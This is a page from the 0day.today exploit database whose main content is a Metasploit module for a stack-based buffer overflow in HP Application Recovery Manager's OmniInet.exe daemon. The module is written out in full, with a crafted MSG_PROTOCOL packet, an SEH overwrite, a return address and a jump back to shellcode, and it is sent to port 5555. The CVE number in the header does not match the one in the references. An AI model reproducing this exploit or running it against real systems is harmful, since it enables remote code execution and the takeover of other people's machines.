0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
HP Application Recovery Manager (OmniInet.exe) Buffer Overflow
============================================================== HP Application Recovery Manager (OmniInet.exe) Buffer Overflow ============================================================== # Title: HP Application Recovery Manager (OmniInet.exe) Buffer Overflow # CVE-ID: (2009-3844) # OSVDB-ID: (60852) # Author: EgiX # Published: 2009-12-26 # Verified: yes view source print? class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'HP Application Recovery Manager (OmniInet.exe) Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow in HP Application Recovery Manager OmniInet daemon. By sending a specially crafted MSG_PROTOCOL packet, a remote attacker may be able to execute arbitrary code. }, 'Author' => 'EgiX <n0b0d13s[at]gmail.com>', 'References' => [ [ 'CVE', '2009-3884' ], [ 'BID', '37250' ], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-09-091' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'seh', }, 'Payload' => { 'Space' => 4658, 'BadChars' => '\x00', }, 'Platform' => 'win', 'Targets' => [ [ 'Windows Universal', { 'Ret' => 0x004412ed } ], # OmniInet.exe pop ecx; pop ecx; ret ], 'DefaultTarget' => 0)) register_options([Opt::RPORT(5555)], self.class) end def exploit connect off = payload_space + 8 sep = "\x00\x00\x20\x00" buff = "\x00\x00\x12\x67" # packet length buff << "\xff\xfe\x32\x00\x36\x00\x37\x00" # MSG_PROTOCOL command buff << sep + rand_text_alpha_upper(2) buff << sep + rand_text_alpha_upper(2) buff << sep + rand_text_alpha_upper(2) buff << sep + rand_text_alpha_upper(2) buff << sep + payload.encoded + generate_seh_record(target.ret) # jump back to shellcode buff << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-" + off.to_s).encode_string buff << sep print_status("Sending MSG_PROTOCOL packet") sock.put(buff) sleep(5) handler disconnect end end # 0day.today [2024-11-14] #